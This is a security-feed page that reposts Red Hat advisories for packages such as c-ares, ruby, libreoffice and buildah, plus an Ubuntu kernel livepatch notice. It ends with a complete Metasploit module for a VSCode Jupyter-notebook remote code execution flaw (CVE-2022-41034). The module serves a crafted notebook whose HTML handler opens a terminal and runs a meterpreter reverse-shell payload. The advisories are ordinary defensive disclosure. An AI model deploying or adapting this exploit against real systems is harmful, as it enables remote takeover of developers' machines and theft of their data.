Red Hat Security Advisory 2024-3842-03 - An update for c-ares is now available for Red Hat Enterprise Linux 9. Issues addressed include an out of bounds read vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_3842.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Low: c-ares security updateAdvisory ID:        RHSA-2024:3842-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:3842Issue date:         2024-06-12Revision:           03CVE Names:          CVE-2024-25629====================================================================Summary: An update for c-ares is now available for Red Hat Enterprise Linux 9.Red Hat Product Security has rated this update as having a security impact of Low. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:The c-ares C library defines asynchronous DNS (Domain Name System) requests and provides name resolving API.Security Fix(es):* c-ares: Out of bounds read in ares__read_line() (CVE-2024-25629)For more details about the security issue(s), including the impact, a CVSSscore, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-25629References:https://access.redhat.com/security/updates/classification/#lowhttps://bugzilla.redhat.com/show_bug.cgi?id=2265713

Red Hat Security Advisory 2024-3842-03

Red Hat Security Advisory 2024-3838-03 - An update for ruby is now available for Red Hat Enterprise Linux 9. Issues addressed include HTTP response splitting and denial of service vulnerabilities.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_3838.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Moderate: ruby security update  
Advisory ID:        RHSA-2024:3838-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:3838  
Issue date:         2024-06-12  
Revision:           03  
CVE Names:          CVE-2021-33621  
====================================================================

Summary: 

An update for ruby is now available for Red Hat Enterprise Linux 9.

Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Ruby is an extensible, interpreted, object-oriented, scripting language. It has features to process text files and to perform system management tasks.

The following packages have been upgraded to a later upstream version: ruby  
(3.0). (RHEL-35740)

Security Fix(es):

* ruby/cgi-gem: HTTP response splitting in CGI (CVE-2021-33621)

* ruby: ReDoS vulnerability in URI (CVE-2023-28755)

* ruby: ReDoS vulnerability in Time (CVE-2023-28756)

* ruby: Buffer overread vulnerability in StringIO (CVE-2024-27280)

* ruby: RCE vulnerability with .rdoc_options in RDoc (CVE-2024-27281)

* ruby: Arbitrary memory address read vulnerability with Regex search (CVE-2024-27282)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2021-33621

References:

https://access.redhat.com/security/updates/classification/#moderate  
https://bugzilla.redhat.com/show_bug.cgi?id=2149706  
https://bugzilla.redhat.com/show_bug.cgi?id=2184059  
https://bugzilla.redhat.com/show_bug.cgi?id=2184061  
https://bugzilla.redhat.com/show_bug.cgi?id=2270749  
https://bugzilla.redhat.com/show_bug.cgi?id=2270750  
https://bugzilla.redhat.com/show_bug.cgi?id=2276810

Red Hat Security Advisory 2024-3838-03

Red Hat Security Advisory 2024-3837-03 - An update for 389-ds-base is now available for Red Hat Enterprise Linux 9. Issues addressed include a denial of service vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_3837.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: 389-ds-base security updateAdvisory ID:        RHSA-2024:3837-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:3837Issue date:         2024-06-12Revision:           03CVE Names:          CVE-2024-2199====================================================================Summary: An update for 389-ds-base is now available for Red Hat Enterprise Linux 9.Red Hat Product Security has rated this update as having a security impact ofImportant. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:389 Directory Server is an LDAP version 3 (LDAPv3) compliant server. The basepackages include the Lightweight Directory Access Protocol (LDAP) server andcommand-line utilities for server administration.Security Fix(es):* 389-ds-base: potential denial of service via specially crafted kerberos AS-REQ request (CVE-2024-3657)* 389-ds-base: Malformed userPassword may cause crash at do_modify in slapd/modify.c (CVE-2024-2199)For more details about the security issue(s), including the impact, a CVSSscore, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-2199References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2267976https://bugzilla.redhat.com/show_bug.cgi?id=2274401

Red Hat Security Advisory 2024-3837-03

Red Hat Security Advisory 2024-3835-03 - An update for libreoffice is now available for Red Hat Enterprise Linux 9.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_3835.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: libreoffice security updateAdvisory ID:        RHSA-2024:3835-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:3835Issue date:         2024-06-12Revision:           03CVE Names:          CVE-2023-6185====================================================================Summary: An update for libreoffice is now available for Red Hat Enterprise Linux 9.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:LibreOffice is an open source, community-developed office productivity suite. It includes key desktop applications, such as a word processor, a spreadsheet, a presentation manager, a formula editor, and a drawing program. LibreOffice replaces OpenOffice and provides a similar but enhanced and extended office suite.Security Fix(es):* libreoffice: Improper Input Validation leading to arbitrary gstreamer plugin execution (CVE-2023-6185)* libreoffice: Insufficient macro permission validation leading to macro execution (CVE-2023-6186)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-6185References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2254003https://bugzilla.redhat.com/show_bug.cgi?id=2254005

Red Hat Security Advisory 2024-3835-03

Red Hat Security Advisory 2024-3834-03 - An update for gdk-pixbuf2 is now available for Red Hat Enterprise Linux 9.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_3834.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: gdk-pixbuf2 security updateAdvisory ID:        RHSA-2024:3834-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:3834Issue date:         2024-06-12Revision:           03CVE Names:          CVE-2022-48622====================================================================Summary: An update for gdk-pixbuf2 is now available for Red Hat Enterprise Linux 9.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:The gdk-pixbuf2 packages provide an image loading library that can be extendedby loadable modules for new image formats. It is used by toolkits such as GTK+or clutter.Security Fix(es):* gdk-pixbuf2: heap memory corruption on gdk-pixbuf (CVE-2022-48622)For more details about the security issue(s), including the impact, a CVSSscore, acknowledgments, and other related information, refer to the CVE page(s)listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2022-48622References:https://access.redhat.com/security/updates/classification/#moderatehttps://bugzilla.redhat.com/show_bug.cgi?id=2260545

Red Hat Security Advisory 2024-3834-03

Red Hat Security Advisory 2024-3831-03 - An update for containernetworking-plugins is now available for Red Hat Enterprise Linux 9. Issues addressed include a memory exhaustion vulnerability.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_3831.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Moderate: containernetworking-plugins security and bug fix update  
Advisory ID:        RHSA-2024:3831-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:3831  
Issue date:         2024-06-12  
Revision:           03  
CVE Names:          CVE-2023-45290  
====================================================================

Summary: 

An update for containernetworking-plugins is now available for Red Hat Enterprise Linux 9.

Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

The Container Network Interface (CNI) project consists of a specification and libraries for writing plug-ins for configuring network interfaces in Linux containers, along with a number of supported plug-ins. CNI concerns itself only with network connectivity of containers and removing allocated resources when the container is deleted. 

Security Fix(es):

* golang: net/http: memory exhaustion in Request.ParseMultipartForm (CVE-2023-45290)

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2023-45290

References:

https://access.redhat.com/security/updates/classification/#moderate  
https://bugzilla.redhat.com/show_bug.cgi?id=2268017

Red Hat Security Advisory 2024-3831-03

Red Hat Security Advisory 2024-3830-03 - An update for gvisor-tap-vsock is now available for Red Hat Enterprise Linux 9. Issues addressed include a memory exhaustion vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_3830.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: gvisor-tap-vsock security and bug fix updateAdvisory ID:        RHSA-2024:3830-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:3830Issue date:         2024-06-12Revision:           03CVE Names:          CVE-2023-45290====================================================================Summary: An update for gvisor-tap-vsock is now available for Red Hat Enterprise Linux 9.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:A replacement for libslirp and VPNKit, written in pure Go. It is based on the network stack of gVisor and is used to provide networking for podman-machine virtual machines. Compared to libslirp, gvisor-tap-vsock brings a configurable DNS server and dynamic port forwarding.Security Fix(es):* golang: net/http: memory exhaustion in Request.ParseMultipartForm (CVE-2023-45290)Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-45290References:https://access.redhat.com/security/updates/classification/#moderatehttps://bugzilla.redhat.com/show_bug.cgi?id=2268017

Red Hat Security Advisory 2024-3830-03

Red Hat Security Advisory 2024-3827-03 - An update for buildah is now available for Red Hat Enterprise Linux 9. Issues addressed include memory exhaustion and resource exhaustion vulnerabilities.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_3827.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Moderate: buildah security and bug fix update  
Advisory ID:        RHSA-2024:3827-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:3827  
Issue date:         2024-06-12  
Revision:           03  
CVE Names:          CVE-2023-45290  
====================================================================

Summary: 

An update for buildah is now available for Red Hat Enterprise Linux 9.

Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

The buildah package provides a tool for facilitating building OCI container images. Among other things, buildah enables you to: Create a working container, either from scratch or using an image as a starting point; Create an image, either from a working container or using the instructions in a Dockerfile; Build both Docker and OCI images. 

Security Fix(es):

* golang: net/http: memory exhaustion in Request.ParseMultipartForm (CVE-2023-45290)

* jose-go: improper handling of highly compressed data (CVE-2024-28180)

* buildah: jose: resource exhaustion (CVE-2024-28176)

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2023-45290

References:

https://access.redhat.com/security/updates/classification/#moderate  
https://bugzilla.redhat.com/show_bug.cgi?id=2268017  
https://bugzilla.redhat.com/show_bug.cgi?id=2268820  
https://bugzilla.redhat.com/show_bug.cgi?id=2268854

Red Hat Security Advisory 2024-3827-03

It was discovered that the ATA over Ethernet (AoE) driver in the Linux kernel contained a race condition, leading to a use-after-free vulnerability. An attacker could use this to cause a denial of service or possibly execute arbitrary code. It was discovered that a race condition existed in the AppleTalk networking subsystem of the Linux kernel, leading to a use-after-free vulnerability. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. Various other issues were also addressed.

Linux kernel vulnerabilities

A security issue affects these releases of Ubuntu and its derivatives:

-   Ubuntu 20.04 LTS  
-   Ubuntu 18.04 LTS  
-   Ubuntu 22.04 LTS

Summary

Several security issues were fixed in the kernel.

Software Description

-   linux - Linux kernel  
-   linux-aws - Linux kernel for Amazon Web Services (AWS) systems  
-   linux-azure - Linux kernel for Microsoft Azure Cloud systems  
-   linux-gcp - Linux kernel for Google Cloud Platform (GCP) systems  
-   linux-gke - Linux kernel for Google Container Engine (GKE) systems  
-   linux-gkeop - Linux kernel for Google Container Engine (GKE) systems  
-   linux-ibm - Linux kernel for IBM cloud systems  
-   linux-oracle - Linux kernel for Oracle Cloud systems

Details

It was discovered that the ATA over Ethernet (AoE) driver in the Linux  
kernel contained a race condition, leading to a use-after-free  
vulnerability. An attacker could use this to cause a denial of service  
or possibly execute arbitrary code. (CVE-2023-6270)

It was discovered that a race condition existed in the AppleTalk  
networking subsystem of the Linux kernel, leading to a use-after-free  
vulnerability. A local attacker could use this to cause a denial of  
service (system crash) or possibly execute arbitrary code.  
(CVE-2023-51781)

In the Linux kernel, the following vulnerability has been  
resolved: netfilter: nft_set_rbtree: skip end interval element from gc  
rbtree lazy gc on insert might collect an end interval element that has  
been just added in this transactions, skip end interval elements that  
are not yet active. (CVE-2024-26581)

In the Linux kernel, the following vulnerability has been  
resolved: net: qualcomm: rmnet: fix global oob in rmnet_policy The  
variable rmnet_link_ops assign a bigger maxtype which leads to a global  
out-of- bounds read when parsing the netlink attributes. (CVE-2024-26597)

Update instructions

The problem can be corrected by updating your kernel livepatch to the  
following versions:

Ubuntu 20.04 LTS  
    aws - 104.1  
    azure - 104.1  
    gcp - 104.1  
    generic - 104.1  
    gke - 104.1  
    gkeop - 104.1  
    ibm - 104.1  
    lowlatency - 104.1  
    oracle - 104.1

Ubuntu 18.04 LTS  
    generic - 104.1  
    lowlatency - 104.1

Ubuntu 22.04 LTS  
    aws - 104.1  
    azure - 104.1  
    gcp - 104.1  
    generic - 104.1  
    gke - 104.1  
    ibm - 104.1  
    lowlatency - 104.1  
    oracle - 104.1

Support Information

Livepatches for supported LTS kernels will receive upgrades for a period  
of up to 13 months after the build date of the kernel.

Livepatches for supported HWE kernels which are not based on an LTS  
kernel version will receive upgrades for a period of up to 9 months  
after the build date of the kernel, or until the end of support for that  
kernel’s non-LTS distro release version, whichever is sooner.

References

-   CVE-2023-6270  
-   CVE-2023-51781  
-   CVE-2024-26581  
-   CVE-2024-26597

Kernel Live Patch Security Notice LSN-0104-1

VSCode when opening a Jupyter notebook (.ipynb) file bypasses the trust model. On versions v1.4.0 through v1.71.1, its possible for the Jupyter notebook to embed HTML and javascript, which can then open new terminal windows within VSCode. Each of these new windows can then execute arbitrary code at startup. During testing, the first open of the Jupyter notebook resulted in pop-ups displaying errors of unable to find the payload exe file. The second attempt at opening the Jupyter notebook would result in successful execution. Successfully tested against VSCode 1.70.2 on Windows 10.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpServer  def initialize(info = {})    super(      update_info(        info,        'Name' => 'VSCode ipynb Remote Development RCE',        'Description' => %q{          VSCode when opening an Jupyter notebook (.ipynb) file bypasses the trust model.          On versions v1.4.0 - v1.71.1, its possible for the Jupyter notebook to embed          HTML and javascript, which can then open new terminal windows within VSCode.          Each of these new windows can then execute arbitrary code at startup.          During testing, the first open of the Jupyter notebook resulted in pop-ups          displaying errors of unable to find the payload exe file. The second attempt          at opening the Jupyter notebook would result in successful exeuction.          Successfully tested against VSCode 1.70.2 on Windows 10.        },        'License' => MSF_LICENSE,        'Author' => [          'h00die', # metasploit module          'Zemnmez'        ],        'References' => [          ['URL', 'https://github.com/google/security-research/security/advisories/GHSA-pw56-c55x-cm9m'],          ['CVE', '2022-41034'],          ['URL', 'https://github.com/andyhsu024/CVE-2022-41034']        ],        'DisclosureDate' => '2022-11-22',        'Privileged' => false,        'Arch' => ARCH_CMD,        'Stance' => Stance::Aggressive,        'Payload' => { 'BadChars' => '&"' },        'Targets' => [          [            'Windows',            {              'Platform' => 'win',              'DefaultOptions' => {                'PAYLOAD' => 'cmd/windows/http/x64/meterpreter/reverse_tcp'              }            }          ],          [            'Linux File-Dropper',            {              'Platform' => 'linux',              'DefaultOptions' => {                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'              }            }          ]        ],        'DefaultTarget' => 0,        'DefaultOptions' => {          'WfsDelay' => 3_600, # 1hr          'URIPATH' => 'project.ipynb'        },        'Notes' => {          'Stability' => [CRASH_SAFE],          # on windows it will say the final payload can't be found          # however, it is, seems to be a timing issue, 2nd exploit attempt          # works perfectly          'Reliability' => [REPEATABLE_SESSION, FIRST_ATTEMPT_FAIL],          'SideEffects' => [SCREEN_EFFECTS]        }      )    )    register_options(      [        OptString.new('PAYLOAD_FILENAME', [ false, 'Name of the payload file - only required when exploiting on Linux.', 'shell.sh' ]),        OptString.new('WRITABLE_DIR', [ false, 'Name of the writable directory containing the payload file - required when exploiting on Linux .', '/tmp/' ]),      ]    )  end  def check    CheckCode::Unsupported  end  def exploit    unless datastore['URIPATH'].end_with? '.ipynb'      fail_with(Failure::BadConfig, 'URIPATH must end in .ipynb for exploit to be successful')    end    print_status('Starting up web service...')    start_service    sleep(datastore['WFSDELAY'])  end  def on_request_uri(cli, request)    super unless request.uri.end_with? datastore['URIPATH']    if target['Platform'] == 'win'      config = { 'executable' => 'cmd.exe', 'args' => "/c #{payload.raw}" }    else      config = { 'executable' => "/#{datastore['WRITABLE_DIR']}/#{datastore['PAYLOAD_FILENAME']}" }    end    pload = JSON.dump({ 'config' => config })    pload = CGI.escape(pload).gsub('+', '%20') # XXX not sure if this is needed or not, but it works    ipynb = %|{"cells": [  {  "cell_type": "markdown",  "metadata": {},  "source": [    "<img src=a onerror=\\"let q = document.createElement('a');q.href='command:workbench.action.terminal.new?#{pload}';document.body.appendChild(q);q.click()\\"/>"  ]  }]}|    send_response(cli, ipynb, {      'Connection' => 'close',      'Pragma' => 'no-cache',      'Access-Control-Allow-Origin' => '*'    })    print_status("Sent #{datastore['URIPATH']} to #{cli.peerhost}")  endend

Tag

#linux